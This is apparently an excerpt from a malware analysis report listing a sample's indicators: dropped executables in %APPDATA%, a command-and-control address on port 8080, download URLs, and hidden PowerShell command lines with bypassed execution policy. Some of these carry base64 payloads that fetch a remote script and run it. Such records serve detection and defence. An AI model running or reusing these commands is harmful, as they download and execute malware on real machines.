Technical Information
- %APPDATA%\ak49.exe
- %APPDATA%\test.exe
- '5.###.155.47':8080
- http://5.###.155.47:8080/AK49.exe via 5.###.155.47
- http://5.###.155.47:8080/test.exe via 5.###.155.47
- '%APPDATA%\ak49.exe'
- '%APPDATA%\test.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function NNoNSFCpa($pprplnThYhdbh, $IbaYRkzZ){[IO.File]::WriteAllBytes($pprplnThYhdbh, $IbaYRkzZ)};function HHFPdkCmeJzi($pprplnThYhdbh){if($pprplnThYhdbh.EndsWith...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell -ep bypass -w hidden -e aQB3AHIAIABoAHQAdABwADoALwAvADUALgAxADgAMAAuADEANQA1AC4ANAA3ADoAOAAwADgAMAAvAHMAeQBzADIALgBwAHMAMQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAB8ACAAaQB...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep bypass -w hidden -e aQB3AHIAIABoAHQAdABwADoALwAvADUALgAxADgAMAAuADEANQA1AC4ANAA3ADoAOAAwADgAMAAvAHMAeQBzADIALgBwAHMAMQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAB8ACAAaQBlAHgA